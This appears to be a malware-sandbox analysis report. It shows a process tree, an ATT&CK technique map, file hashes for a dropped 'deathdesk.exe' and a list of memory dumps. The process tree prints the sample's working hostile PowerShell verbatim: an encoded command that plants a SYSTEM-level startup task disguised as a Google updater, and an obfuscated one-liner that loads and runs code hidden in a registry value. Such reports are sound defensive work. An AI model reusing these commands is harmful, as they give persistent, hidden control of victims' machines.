"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAbwBvAHgAIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAnACAALQBBAHIAZwB1AG0AZQBuAHQAIAAnAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAIgBQAEEAQQBqAEEARwBzAEEAZABRAEEAagBBAEQANABBAEkAQQBCAFQAQQBIAFEAQQBZAFEAQgB5AEEASABRAEEATABRAEIAUQBBAEgASQBBAGIAdwBCAGoAQQBHAFUAQQBjAHcAQgB6AEEAQwBBAEEATABRAEIARwBBAEcAawBBAGIAQQBCAGwAQQBGAEEAQQBZAFEAQgAwAEEARwBnAEEASQBBAEEAbgBBAEUATQBBAE8AZwBCAGMAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAEkAQQBCAEcAQQBHAGsAQQBiAEEAQgBsAEEASABNAEEAWABBAEIASABBAEcAOABBAGIAdwBCAG4AQQBHAHcAQQBaAFEAQgBjAEEARQBNAEEAYQBBAEIAeQBBAEcAOABBAGIAUQBCAGwAQQBGAHcAQQBkAFEAQgB3AEEARwBRAEEAWQBRAEIAMABBAEcAVQBBAGMAZwBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEASQBBAEEAdABBAEYAWQBBAFoAUQBCAHkAQQBHAEkAQQBJAEEAQgBTAEEASABVAEEAYgBnAEIAQgBBAEgATQBBAEkAQQBBADgAQQBDAE0AQQBiAHcAQgB6AEEAQwBNAEEAUABnAEEAPQAiACcAKQAgADwAIwByAHEAZABxACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAaABwACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAagB1AGsAeQAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUAVABhAHMAawBNAGEAYwBoAGkAbgBlAFEAQwAnACAALQBVAHMAZQByACAAJwBTAHkAcwB0AGUAbQAnACAALQBSAHUAbgBMAGUAdgBlAGwAIAAnAEgAaQBnAGgAZQBzAHQAJwAgAC0ARgBvAHIAYwBlACAAPAAjAHIAeQBrAHcAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEkATgBlAHQAQwBhAGMAaABlAFwASQBFAFwARABVAEgASQBSAEsARwBZAFwAZABlAGEAdABoAGQAZQBzAGsALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwBwAHkAIwA+ADsAIABTAHQAYQByAHQALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAAPAAjAHQAbAB1AGEAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwA7AA=="
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5096

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1784

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
1⤵
PID:3900

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{652b3b9b-82d6-4de6-ba3c-c932f1f79bf0}
1⤵
PID:1000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAGsAdQAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAbwBzACMAPgA="
1⤵
PID:1864

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

2

T1031

Privilege Escalation

Defense Evasion

Modify Registry

4

T1112

Impair Defenses

1

T1562

File Permissions Modification

1

T1222

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\69C6F6EC64E114822DF688DC12CDD86C
Filesize
631B

MD5
38f881f3a073a20f6b215b338d664f52

SHA1
9da80c3ff4c1c1dbff8699923870ba26a61a9feb

SHA256
cbe0e13b55fa32d0bd7899d6bbad0c69d24cb11da9d53c2ce30d0d68895d5558

SHA512
353b0d1debe1e2f2ab706f9102af2da10989d58e65ace6b9641c40f909dc89f368c31aa0a4629265288aafe81c82a002e1235be83b9e32d155760d523ef950eb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\69C6F6EC64E114822DF688DC12CDD86C
Filesize
242B

MD5
c6026df6f7bf5f9830fc2df0a0615c95

SHA1
1ceb7348b882894450987dc1c5a3265de851ea4c

SHA256
d07f2fd8b5e1cc594b6654119bb83012929d0dfbe704242321f381464fa6bbc8

SHA512
eb575b378bce7abe48667088101b62c951319b0aaa0d1e3c67c9591c845f030fd8b03fbdddb32b81d6b5487d5ed207d2378e5ee3a0b92c2e833ca6117a4a5a7d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\dqptnfu\imagestore.dat
Filesize
1KB

MD5
c1939279d0162f6df9702421acf4f3f0

SHA1
96d22ba99d448b5ed032041a6a0340b83daba4f9

SHA256
6525e7ab930fc2bfc051d9a22647bf01f806f81885a5cdc585d6b896fdd2b289

SHA512
65b655be69c7add47adbf4caf4f2e46a088e24cf71f2ae50736fe639dc8f7571ea7a49080f180ef18e0df6d0ebb52259f66378a1acb4bda17147ab4cf13003e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DUHIRKGY\deathdesk.exe
Filesize
4.5MB

MD5
5b8ebf669498f7a9fd3c1b89718b80f0

SHA1
f3704d8d69d7ca9b7724faad1d6d98ef865ea0f4

SHA256
a1cc88eb81b1e57c3351c39f56002670f1b8c488e6c65b9ba8a5393458e4f6a6

SHA512
c48fb1076c731768d1cd739a4a80a43a3c5a454e743a43094245c08f17229b6d6b9af7154fd841b7832bddce6ddd89501986b46740311e289635c232089e568a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DUHIRKGY\deathdesk.exe.3tgyv73.partial
Filesize
4.5MB

MD5
5b8ebf669498f7a9fd3c1b89718b80f0

SHA1
f3704d8d69d7ca9b7724faad1d6d98ef865ea0f4

SHA256
a1cc88eb81b1e57c3351c39f56002670f1b8c488e6c65b9ba8a5393458e4f6a6

SHA512
c48fb1076c731768d1cd739a4a80a43a3c5a454e743a43094245c08f17229b6d6b9af7154fd841b7832bddce6ddd89501986b46740311e289635c232089e568a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
3a6bad9528f8e23fb5c77fbd81fa28e8

SHA1
f127317c3bc6407f536c0f0600dcbcf1aabfba36

SHA256
986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05

SHA512
846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

Download Submit
memory/60-175-0x0000000000000000-mapping.dmp

Download
memory/228-156-0x0000000000000000-mapping.dmp

Download
memory/776-152-0x0000000000000000-mapping.dmp

Download
memory/1000-194-0x00007FF8C8630000-0x00007FF8C86EE000-memory.dmp

Filesize
760KB

Download
memory/1000-191-0x00007FF8C9110000-0x00007FF8C9305000-memory.dmp

Filesize
2.0MB

Download
memory/1000-187-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/1000-185-0x00000001400033F4-mapping.dmp

Download
memory/1000-183-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/1000-188-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/1000-199-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/1000-200-0x00007FF8C9110000-0x00007FF8C9305000-memory.dmp

Filesize
2.0MB

Download
memory/1196-158-0x0000000000000000-mapping.dmp

Download
memory/1332-144-0x0000000000000000-mapping.dmp

Download
memory/1636-149-0x0000000000000000-mapping.dmp

Download
memory/1784-195-0x00007FF8A7FF0000-0x00007FF8A8AB1000-memory.dmp

Filesize
10.8MB

Download
memory/1784-179-0x00007FF8C9110000-0x00007FF8C9305000-memory.dmp

Filesize
2.0MB

Download
memory/1784-181-0x00007FF8C8630000-0x00007FF8C86EE000-memory.dmp

Filesize
760KB

Download
memory/1784-182-0x00007FF8A7FF0000-0x00007FF8A8AB1000-memory.dmp

Filesize
10.8MB

Download
memory/1784-189-0x00007FF8C9110000-0x00007FF8C9305000-memory.dmp

Filesize
2.0MB

Download
memory/1784-192-0x00007FF8C8630000-0x00007FF8C86EE000-memory.dmp

Filesize
760KB

Download
memory/1800-174-0x0000000000000000-mapping.dmp

Download
memory/1836-150-0x0000000000000000-mapping.dmp

Download
memory/1844-148-0x0000000000000000-mapping.dmp

Download
memory/1888-147-0x0000000000000000-mapping.dmp

Download
memory/2280-173-0x0000000000000000-mapping.dmp

Download
memory/2504-186-0x0000000000000000-mapping.dmp

Download
memory/2688-160-0x0000000000000000-mapping.dmp

Download
memory/2776-161-0x0000000000000000-mapping.dmp

Download
memory/3364-154-0x0000000000000000-mapping.dmp

Download
memory/3488-139-0x00007FF8A7FF0000-0x00007FF8A8AB1000-memory.dmp

Filesize
10.8MB

Download
memory/3488-138-0x0000000000370000-0x00000000007F4000-memory.dmp

Filesize
4.5MB

Download
memory/3488-145-0x000000001F4D0000-0x000000001F4E2000-memory.dmp

Filesize
72KB

Download
memory/3488-136-0x0000000000000000-mapping.dmp

Download
memory/3488-178-0x00007FF8A7FF0000-0x00007FF8A8AB1000-memory.dmp

Filesize
10.8MB

Download
memory/3712-169-0x0000000000000000-mapping.dmp

Download
memory/3844-177-0x0000000000000000-mapping.dmp

Download
memory/3900-190-0x0000000004860000-0x00000000048C6000-memory.dmp

Filesize
408KB

Download
memory/3900-193-0x00000000048D0000-0x0000000004936000-memory.dmp

Filesize
408KB

Download
memory/3900-176-0x0000000003FC0000-0x00000000045E8000-memory.dmp

Filesize
6.2MB

Download
memory/3900-172-0x0000000003820000-0x0000000003856000-memory.dmp

Filesize
216KB

Download
memory/3900-198-0x0000000004DE0000-0x0000000004DFE000-memory.dmp

Filesize
120KB

Download
memory/3900-184-0x0000000003EB0000-0x0000000003ED2000-memory.dmp

Filesize
136KB

Download
memory/4040-143-0x0000000000000000-mapping.dmp

Download
memory/4052-151-0x0000000000000000-mapping.dmp

Download
memory/4116-146-0x0000000000000000-mapping.dmp

Download
memory/4140-155-0x0000000000000000-mapping.dmp

Download
memory/4144-166-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/4144-165-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/4144-162-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/4144-164-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/4144-163-0x0000000140001844-mapping.dmp

Download
memory/4300-153-0x0000000000000000-mapping.dmp

Download
memory/4452-201-0x0000000000000000-mapping.dmp

Download
memory/4572-202-0x0000000000000000-mapping.dmp

Download
memory/4632-157-0x0000000000000000-mapping.dmp

Download
memory/4832-171-0x0000000000000000-mapping.dmp

Download
memory/4836-141-0x000002443B270000-0x000002443B292000-memory.dmp

Filesize
136KB

Download
memory/4836-140-0x0000000000000000-mapping.dmp

Download
memory/4836-142-0x00007FF8A7FF0000-0x00007FF8A8AB1000-memory.dmp

Filesize
10.8MB

Download
memory/4872-196-0x0000000000000000-mapping.dmp

Download
memory/5044-197-0x0000000000000000-mapping.dmp

Download
memory/5056-159-0x0000000000000000-mapping.dmp

Download
memory/5096-180-0x00007FF8A7FF0000-0x00007FF8A8AB1000-memory.dmp

Filesize
10.8MB

Download
memory/5096-167-0x0000000000000000-mapping.dmp

Download
memory/5096-203-0x00007FF8A7FF0000-0x00007FF8A8AB1000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads